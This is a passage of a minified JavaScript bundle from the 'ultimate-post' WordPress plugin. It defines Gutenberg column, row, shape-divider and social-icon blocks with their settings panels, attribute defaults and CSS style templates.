Height","ultimate-post")}},{position:6,data:{type:"group",key:"columnDirection",justify:!0,options:[{value:"column",label:__("Vertical","ultimate-post")},{value:"row",label:__("Horizontal","ultimate-post")}],label:__("Flex Direction","ultimate-post")}},{position:4,data:{type:"alignment",key:"columnJustify",disableJustify:!0,responsive:!0,icons:["juststart","justcenter","justend","justbetween","justaround","justevenly"],options:["flex-start","center","flex-end","space-between","space-around","space-evenly"],label:__("Inside Alignment ( Horizontal )","ultimate-post")}},{position:5,data:{type:"alignment",block:"column-column",key:"columnAlign",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd","stretch"],options:["flex-start","center","flex-end","space-between"],label:__("Inside Content Alignment ( Vertical )","ultimate-post")}},{position:5,data:{type:"alignment",block:"column-column",key:"columnAlignItems",disableJustify:!0,icons:["algnStart","algnCenter","algnEnd"],options:["flex-start","center","flex-end"],label:__("Inside Items Alignment","ultimate-post")}},{position:7,data:{type:"range",key:"columnItemGap",min:0,max:300,step:1,responsive:!1,label:__("Gap","ultimate-post")}},{position:8,data:{type:"group",key:"columnWrap",justify:!0,options:[{value:"no",label:__("No","ultimate-post")},{value:"wrap",label:__("Wrap","ultimate-post")},{value:"nowrap",label:__("No Wrap","ultimate-post")}],label:__("Column Wrap","ultimate-post")}},{position:9,data:{type:"toggle",key:"reverseCol",label:__("Reverse","ultimate-post")}}],initialOpen:!0,store:t}),(0,o.createElement)(a.T,{title:__("Background & Wrapper","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"colBgImg",image:!0,label:__("Background","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"columnWrapHoverImg",image:!0,label:__("Background","ultimate-post")}]}]}}],initialOpen:!1,store:t}),(0,o.createElement)(a.T,{title:__("Background Overlay","ultimate-post"),include:[{position:1,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"columnOverlayImg",image:!0,label:__("Background","ultimate-post")},{type:"range",key:"colOverlayOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"columnOverlayilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"columnOverlayBlend",options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"columnOverlaypHoverImg",image:!0,label:__("Background","ultimate-post")},{type:"range",key:"colOverlayHovOpacity",min:0,max:100,step:1,responsive:!1,unit:!1,label:__("Opacity","ultimate-post")},{type:"filter",key:"columnOverlayHoverFilter",label:__("CSS Filter","ultimate-post")},{type:"select",key:"columnOverlayHoverBlend",options:[{value:"",label:__("Select","ultimate-post")},{value:"normal",label:__("Normal","ultimate-post")},{value:"multiply",label:__("Multiply","ultimate-post")},{value:"screen",label:__("Screen","ultimate-post")},{value:"overlay",label:__("Overlay","ultimate-post")},{value:"darken",label:__("Darken","ultimate-post")},{value:"lighten",label:__("Lighten","ultimate-post")},{value:"color-dodge",label:__("Color Dodge","ultimate-post")},{value:"color-burn",label:__("Color Burn","ultimate-post")},{value:"hard-light",label:__("Hard Light","ultimate-post")},{value:"soft-light",label:__("Soft Light","ultimate-post")},{value:"difference",label:__("Difference","ultimate-post")},{value:"exclusion",label:__("Exclusion","ultimate-post")},{value:"hue",label:__("Hue","ultimate-post")},{value:"saturation",label:__("Saturation","ultimate-post")},{value:"luminosity",label:__("Luminosity","ultimate-post")},{value:"color",label:__("Color","ultimate-post")}],help:"Notice: Background Color Requierd",label:__("Blend Mode","ultimate-post")}]}]}}],initialOpen:!1,store:t}),(0,o.createElement)(a.T,{title:__("Spacing & Border Style","ultimate-post"),include:[{position:1,data:{type:"dimension",key:"colWrapMargin",step:1,unit:!0,responsive:!0,label:__("Margin","ultimate-post")}},{position:2,data:{type:"dimension",key:"colWrapPadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}},{position:3,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"border",key:"columnWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"columnWrapRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"columnWrapShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"border",key:"columnWrapHoverBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"columnWrapHoverRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")},{type:"boxshadow",key:"columnWrapHoverShadow",step:1,unit:!0,responsive:!0,label:__("Box shadow","ultimate-post")}]}]}}],store:t}),(0,o.createElement)(a.T,{title:__("Column Color","ultimate-post"),include:[{position:1,data:{type:"color",key:"columnColor",label:__("Color","ultimate-post")}},{position:2,data:{type:"color",key:"colLinkColor",label:__("Link Color","ultimate-post")}},{position:3,data:{type:"color",key:"colLinkHover",label:__("Link Hover Color","ultimate-post")}},{position:4,data:{type:"typography",key:"colTypo",label:__("Typography","ultimate-post")}}],store:t}),(0,o.createElement)(a.T,{depend:"columnSticky",title:__("Sticky Column","ultimate-post"),include:[{position:7,data:{type:"range",key:"columnStickyOffset",min:0,max:300,step:1,unit:["px","rem","vh"],responsive:!0,help:"Note: Sticky Column Working only Front End",label:__("Gap","ultimate-post")}}],initialOpen:!1,store:t}))}},52:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},columnOrderNumber:{type:"string",default:"",style:[{selector:'[data-ultp="{{ULTP}}"], \n            .ultp-row-content > {{ULTP}} { order:{{columnOrderNumber}}; }'}]},columnGutter:{type:"object",default:{lg:"0",sm:"0",xs:"0"}},columnWidth:{type:"object",default:{},anotherKey:"columnGutter",style:[{selector:'[data-ultp="{{ULTP}}"], \n            .ultp-row-content > {{ULTP}} { flex-basis: calc({{columnWidth}} - {{columnGutter}}px);}'}]},columnHeight:{type:"object",default:{lg:"",ulg:"px",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n            .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { min-height: {{columnHeight}};}"}]},columnDirection:{type:"string",default:"column",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { display: flex; flex-direction: {{columnDirection}} }"},{depends:[{key:"columnDirection",condition:"==",value:"column"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { display: flex;  flex-direction: column;}"},{depends:[{key:"reverseCol",condition:"==",value:!0},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { display: flex; flex-direction: row-reverse; }"},{depends:[{key:"reverseCol",condition:"==",value:!0},{key:"columnDirection",condition:"==",value:"column"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { display: flex; flex-direction: column-reverse; }"}]},columnJustify:{type:"object",default:{lg:""},style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { justify-content: {{columnJustify}}; }"}]},columnAlign:{type:"string",default:"",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { align-content: {{columnAlign}}; }"},{depends:[{key:"columnDirection",condition:"==",value:"column"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { justify-content: {{columnAlign}}; }"}]},columnAlignItems:{type:"string",default:"",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { align-items: {{columnAlignItems}}; }"}]},columnItemGap:{type:"string",default:"",style:[{depends:[{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper  { gap: {{columnItemGap}}px; }"}]},columnWrap:{type:"string",default:"wrap",style:[{depends:[{key:"columnWrap",condition:"==",value:"no"},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} { flex-wrap: unset; }"},{depends:[{key:"columnWrap",condition:"==",value:"wrap"},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { flex-wrap: {{columnWrap}}; }"},{depends:[{key:"columnWrap",condition:"==",value:"nowrap"},{key:"columnDirection",condition:"==",value:"row"}],selector:"{{ULTP}} > .ultp-column-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout, \n                .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { flex-wrap: nowrap; }"}]},reverseCol:{type:"boolean",default:!1},colBgImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper"}]},columnWrapHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover"}]},columnOverlayImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay"}]},colOverlayOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay { opacity: {{colOverlayOpacity}}%; }"}]},columnOverlayilter:{type:"object",default:{openFilter:0},style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay { {{columnOverlayilter}} }"}]},columnOverlayBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper > .ultp-column-overlay { mix-blend-mode:{{columnOverlayBlend}}; }"}]},columnOverlaypHoverImg:{type:"object",default:{openColor:0,type:"color",color:"#f5f5f5",size:"cover",repeat:"no-repeat"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay"}]},colOverlayHovOpacity:{type:"string",default:"50",style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay { opacity: {{colOverlayHovOpacity}}%; }"}]},columnOverlayHoverFilter:{type:"object",default:{openFilter:0},style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay { {{columnOverlayHoverFilter}} }"}]},columnOverlayHoverBlend:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper:hover > .ultp-column-overlay { mix-blend-mode:{{columnOverlayHoverBlend}}; }"}]},colWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-column-wrapper { margin: {{colWrapMargin}}; }"}]},colWrapPadding:{type:"object",default:{lg:{top:"0",bottom:"0",left:"0",right:"0",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-column-wrapper { padding: {{colWrapPadding}}; }"}]},columnWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#505050"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper"}]},columnWrapRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper { border-radius: {{columnWrapRadius}};}"}]},columnWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-column-wrapper"}]},columnWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'[data-ultp="{{ULTP}}"]:hover > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}}:hover > .ultp-column-wrapper'}]},columnWrapHoverRadius:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:'[data-ultp="{{ULTP}}"]:hover > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}}:hover > .ultp-column-wrapper { border-radius: {{columnWrapHoverRadius}};}'}]},columnWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:'[data-ultp="{{ULTP}}"]:hover > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}}:hover > .ultp-column-wrapper'}]},columnColor:{type:"string",default:"",style:[{selector:"{{ULTP}} { color: {{columnColor}} } "}]},colLinkColor:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper a { color: {{colLinkColor}} } "}]},colLinkHover:{type:"string",default:"",style:[{selector:"{{ULTP}} > .ultp-column-wrapper a:hover { color: {{colLinkHover}}; } "}]},colTypo:{type:"object",default:{openTypography:0,size:{lg:16,unit:"px"},height:{lg:"",unit:"px"},decoration:"none",family:"",weight:700},style:[{selector:"{{ULTP}}"}]},columnSticky:{type:"boolean",default:!1},columnStickyOffset:{type:"object",default:{lg:"0",ulg:"px"},style:[{depends:[{key:"columnSticky",condition:"==",value:!0}],selector:"{{ULTP}} { position: sticky; top: calc( 32px + {{columnStickyOffset}}); align-self: start; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} {z-index:{{advanceZindex}};}"}]},columnOverflow:{type:"string",default:"visible",style:[{selector:".block-editor-block-list__block > {{ULTP}} > .ultp-column-wrapper, \n            .ultp-row-content > {{ULTP}} > .ultp-column-wrapper { overflow: {{columnOverflow}}; }"}]},columnEnableLink:{type:"boolean",default:!1},columnWrapperLink:{type:"string",default:"example.com",style:[{depends:[{key:"columnEnableLink",condition:"==",value:!0}]}]},columnTargetLink:{type:"boolean",default:!1,style:[{depends:[{key:"columnEnableLink",condition:"==",value:!0}]}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},28578:(e,t,l)=>{"use strict";var o=l(67294),a=l(91202),i=l(70234),n=l(52);const{__}=wp.i18n,{registerBlockType:r}=wp.blocks;r("ultimate-post/column",{title:__("Column","ultimate-post"),parent:["ultimate-post/row"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/column.svg"}),category:"ultimate-post",description:__("Add Column block for your layout.","ultimate-post"),keywords:[__("Column","ultimate-post"),__("Row","ultimate-post")],supports:{reusable:!1,html:!1},attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/wrapper.svg"}},edit:a.Z,save:i.Z})},3609:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(66187),n=l(64626),r=l(40358);const{__}=wp.i18n,{registerBlockType:s,createBlock:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/postx-features/row-column/","block_docs");function u(e){return{type:"block",blocks:[e],transform:(t,l)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},[p("ultimate-post/column",{},[p(e,{...t},l)])])}}s("ultimate-post/row",{title:__("Row","ultimate-post"),icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/row.svg"}),category:"ultimate-post",description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Add Row block for your layout.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),keywords:[__("row","ultimate-post"),__("wrap","ultimate-post"),__("column","ultimate-post")],supports:{align:["center","wide","full"],html:!1,reusable:!1},attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/row.svg"}},transforms:{from:[u("ultimate-post/post-grid-1"),u("ultimate-post/post-grid-2"),u("ultimate-post/post-grid-3"),u("ultimate-post/post-grid-4"),u("ultimate-post/post-grid-5"),u("ultimate-post/post-grid-6"),u("ultimate-post/post-grid-7"),u("ultimate-post/post-list-1"),u("ultimate-post/post-list-2"),u("ultimate-post/post-list-3"),u("ultimate-post/post-list-4"),u("ultimate-post/post-module-1"),u("ultimate-post/post-module-2"),u("ultimate-post/post-grid-parent"),u("ultimate-post/heading"),u("ultimate-post/social-icons"),u("ultimate-post/advanced-list"),u("ultimate-post/accordion"),u("ultimate-post/image"),u("ultimate-post/news-ticker"),u("ultimate-post/social-icons"),u("ultimate-post/ultp-taxonomy"),u("ultimate-post/menu"),u("ultimate-post/star-rating"),u("ultimate-post/tabs"),u("ultimate-post/youtube-gallery"),{type:"block",blocks:["core/columns"],transform:(e,t)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},t.filter((e=>"core/column"===e.name)).map((e=>p("ultimate-post/column",{},e.innerBlocks))))},{type:"block",blocks:["core/group"],transform:(e,t)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},[p("ultimate-post/column",{},t)])},{type:"block",blocks:["core/cover"],transform:(e,t)=>p("ultimate-post/row",{layout:{lg:[100],sm:[100],xs:[100]},previewImg:ultp_data.url+"assets/img/preview/row.svg"},[p("ultimate-post/column",{},t)])}]},edit:i.Z,save:n.Z})},20498:(e,t,l)=>{"use strict";l.d(t,{T:()=>i});var o=l(67294),a=l(60448);const i=(e,t,l,i)=>{const n={asymmetrical_triangle:(0,o.createElement)("g",null,(0,o.createElement)("polygon",{points:"1000,5 732.93,100 0,5 0,0 1000,0 \t"})),asymmetrical_triangle_invert:(0,o.createElement)("polygon",{points:"1000,0 1000,100 732.9,5 0,100 0,0 "}),curve:(0,o.createElement)("path",{d:"M1000,0L1000,0c0,1.3-1,2.5-2.7,3.2C854,61.3,683.2,100,500,100C316.8,100,146,61.3,2.7,3.2C1,2.5,0,1.3,0,0H1000z"}),curve_invert:(0,o.createElement)("g",null,(0,o.createElement)("path",{d:"M1000,100V0H0v100c0-1.3,1-2.5,2.7-3.2C146,38.7,316.8,3.3,500,3.3s354,35.4,497.3,93.6C999,97.5,1000,98.7,1000,100z"})),mountain:(0,o.createElement)("g",null,(0,o.createElement)("path",{style:{opacity:"0.34"},className:"st0",d:"M642.9,36.2c13-11.4,25.1-21.2,39.6-21c37.6,0.6,59.9,52.6,98.2,60.7c1.6,0.3,3.2,0.6,4.8,0.9C768.9,88,750,94.2,726.9,88.5C689.9,79.3,682.5,45.1,642.9,36.2z"}),(0,o.createElement)("path",{style:{opacity:"0.34"},className:"st0",d:"M415.5,29.7c26.1-12.2,54-14.2,86.7,9.8c17.6,13,33,21.2,46.5,25.8c-18.1,13.1-37.2,23.4-70,14.2C453.6,72.5,436.7,48.9,415.5,29.7z"}),(0,o.createElement)("path",{style:{opacity:"0.6"},className:"st1",d:"M548.8,65.3c17.9-12.9,34.9-28.6,63.2-30.8c12.3-0.9,22.4-0.2,31,1.7C620.1,56.2,594.6,81,548.8,65.3z"}),(0,o.createElement)("path",{style:{opacity:"0.6"},className:"st1",d:"M785.5,76.8c34.4-23.1,59.1-67.4,91.7-70.7c52.1-5.2,68,33.1,122.8,33.1v42.4c-43.9,0-56.9-54.7-98-54.4C870.1,28.1,859.2,89.7,785.5,76.8z"}),(0,o.createElement)("path",{style:{opacity:"0.6"},className:"st1",d:"M0,81.6V39.2c62.5,0,62.5-31.9,125-31.9S208.2,61,260,54.2c36-4.7,47.2-51.6,93.2-51.6c27.2,0,46.1,12.2,62.4,27c-63,29.3-115.8,117.1-202.6,38.6c-28.3-25.7-47.6-53.8-103.3-48.3C60.2,24.8,43.9,81.6,0,81.6z"}),(0,o.createElement)("path",{d:"M0,39.2V0.1h1000v39.1c-54.8,0-70.7-38.4-122.8-33.2c-32.6,3.3-57.3,47.6-91.7,70.7c-1.6-0.3-3.1-0.6-4.8-0.9c-38.3-8.1-60.6-60-98.2-60.7c-14.5-0.2-26.6,9.6-39.6,21c-8.6-2-18.7-2.7-31-1.7c-28.3,2.2-45.2,17.9-63.2,30.8c-13.6-4.6-28.9-12.8-46.5-25.8c-32.7-24.1-60.6-22-86.7-9.8c-16.3-14.8-35.2-27-62.4-27c-45.9,0-57.1,46.9-93.2,51.6c-51.7,6.8-72.5-46.9-135-46.9S62.5,39.2,0,39.2z"})),tilt:(0,o.createElement)("polygon",{points:"0,0 1000,0 1000,100 "}),waves:(0,o.createElement)("path",{d:"M1000,0v65.8c-15.6-11.2-31.2-22.4-62.5-22.4c-46.2,0-64.7,33.2-116.2,33.2c-92.3,0-118-65-225.2-65c-121.4,0-132.5,88.5-238.5,88.5c-70.3,0-89.6-51.8-167.4-51.8c-65.4,0-73.4,40-127.8,40C31.3,88.2,15.6,77,0,65.8V0H1000z"}),waves_invert:(0,o.createElement)("path",{d:"M1000,45.7V0H0v45.7c15.6-11.2,31.3-22.4,62.5-22.4c54.4,0,62.4,40,127.8,40c77.7,0,97.1-51.8,167.4-51.8c106,0,117,88.5,238.5,88.5c107.2,0,132.9-65,225.2-65c51.4,0,69.9,33.2,116.2,33.2C968.8,68.1,984.4,56.9,1000,45.7z"})};return(0,o.createElement)("svg",{viewBox:"0 0 1000 100",preserveAspectRatio:"none",fill:i?.openColor?"gradient"==i.type?`url(#${l}shape-${t})`:i.color:"#f5f5f5"},n[e],(0,o.createElement)("defs",null,i?.openColor&&"gradient"==i?.type&&(e=>{const i=(e=(e=")"==(e=(e=(0,a.MR)(e)?e:(0,a._n)("colorcode",e)).replace(/linear-gradient\(|\);/gi,"")).slice(-1)?e.substring(0,e.length-1):e).split("deg,"))[0];return e=(e=e[1].split(/(%,|%)/gi)).filter((function(e){return!["","%","%,"].includes(e)})),(0,o.createElement)("linearGradient",{id:`${l}shape-${t}`,gradientTransform:`rotate(${i})`},e.map(((e,t)=>{let l=e.replace(")",")|||");return l=l.split("|||"),(0,o.createElement)("stop",{key:t,offset:l[1]+"%",stopColor:l[0]})})))})(i.gradient)))}},60553:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(99838),n=l(95667);const{__}=wp.i18n,{InspectorControls:r,InnerBlocks:s,useBlockProps:p}=wp.blockEditor,{useEffect:c,useState:u,useRef:d,Fragment:m}=wp.element,{getBlockAttributes:g,getBlockRootClientId:y}=wp.data.select("core/block-editor");function b(e){const t=d(null),[l,b]=u("Content"),{isSelected:v,setAttributes:h,name:f,attributes:k,className:w,clientId:x,attributes:{previewImg:T,enableIcon:_,enableText:C,blockId:E,advanceId:S,layout:P,iconSize2:L,iconBgSize2:I,iconSize:B,iconBgSize:U,currentPostId:M}}=e;c((()=>{const e=x.substr(0,6),t=g(y(x));(0,a.qi)(h,t,M,x),L.replace&&B&&h({iconSize2:{lg:B}}),I.replace&&U&&h({iconBgSize2:{lg:U}}),E?E&&E!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[x]),c((()=>{const e=t.current;var l;e?((l=e).enableText!=C||l.enableIcon!=_)&&((0,a.Gu)(x),t.current=k):t.current=k}),[k]);const A={setAttributes:h,name:f,attributes:k,setSection:b,section:l,clientId:x};let H;if(E&&(H=(0,i.Kh)(k,"ultimate-post/social-icons",E,(0,a.k0)())),T&&!v)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:T});c((()=>{v&&T&&h({previewImg:""})}),[e?.isSelected]);const N=p({...S&&{id:S},className:`ultp-block-${E} ${w}`});return(0,o.createElement)(m,null,(0,o.createElement)(r,null,(0,o.createElement)(n.Z,{store:A})),(0,o.createElement)("div",N,H&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:H}}),(0,o.createElement)("ul",{className:`ultp-social-icons-wrapper ultp-social-icons-${P}`},(0,o.createElement)(s,{template:[["ultimate-post/social",{socialText:"Facebook",customIcon:"facebook"}],["ultimate-post/social",{socialText:"WordPress",customIcon:"wordpress_solid"}],["ultimate-post/social",{socialText:"WhatsApp",customIcon:"whatsapp"}]],allowedBlocks:["ultimate-post/social"]}))))}},56098:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{InnerBlocks:a,useBlockProps:i}=wp.blockEditor;function n(e){const{blockId:t,advanceId:l,layout:n}=e.attributes,r=i.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",r,(0,o.createElement)("ul",{className:`ultp-social-icons-wrapper ultp-social-icons-${n}`},(0,o.createElement)(a.Content,null)))}},95667:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",block:"social-icons",key:"layout",selector:"ultp-social-layout-setting",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/social_icons/icon1.png",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/social_icons/icon2.png",label:"Layout 2",value:"layout2",pro:!1}]}},{position:2,data:{type:"toggle",key:"iconInline",label:__("Inline View","ultimate-post")}},{position:3,data:{type:"alignment",block:"social-icons",key:"iconAlignment",disableJustify:!0,label:__("Horizontal Alignment","ultimate-post")}},{position:4,data:{type:"range",key:"iconSpace",min:0,max:300,step:1,responsive:!0,label:__("Space Between Items","ultimate-post")}},{position:5,data:{type:"range",key:"iconTextSpace",min:0,max:300,step:1,responsive:!0,label:__("Spacing Between Icon & Texts","ultimate-post")}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Icon/Image","ultimate-post"),depend:"enableIcon",include:[{position:2,data:{type:"group",key:"iconPosition",justify:!0,label:__("Icon - Label Alignment","ultimate-post"),options:[{value:"initial",label:__("Top","ultimate-post")},{value:"center",label:__("Center","ultimate-post")},{value:"end",label:__("Bottom","ultimate-post")}]}},{position:5,data:{type:"dimension",key:"imgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{position:7,data:{type:"range",key:"iconSize2",responsive:!0,label:__("Icon/Image Size","ultimate-post")}},{position:8,data:{type:"range",key:"iconBgSize2",responsive:!0,label:__("Background Size","ultimate-post"),help:"Icon Background Color Required"}},{position:9,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"iconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"iconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"iconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"iconHvrColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"iconHvrBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"iconHvrBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"iconHvrRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),depend:"enableText",include:[{position:2,data:{type:"typography",key:"textTypo",label:__("Text Typography","ultimate-post")}},{position:3,data:{type:"color",key:"textColor",label:__("Text 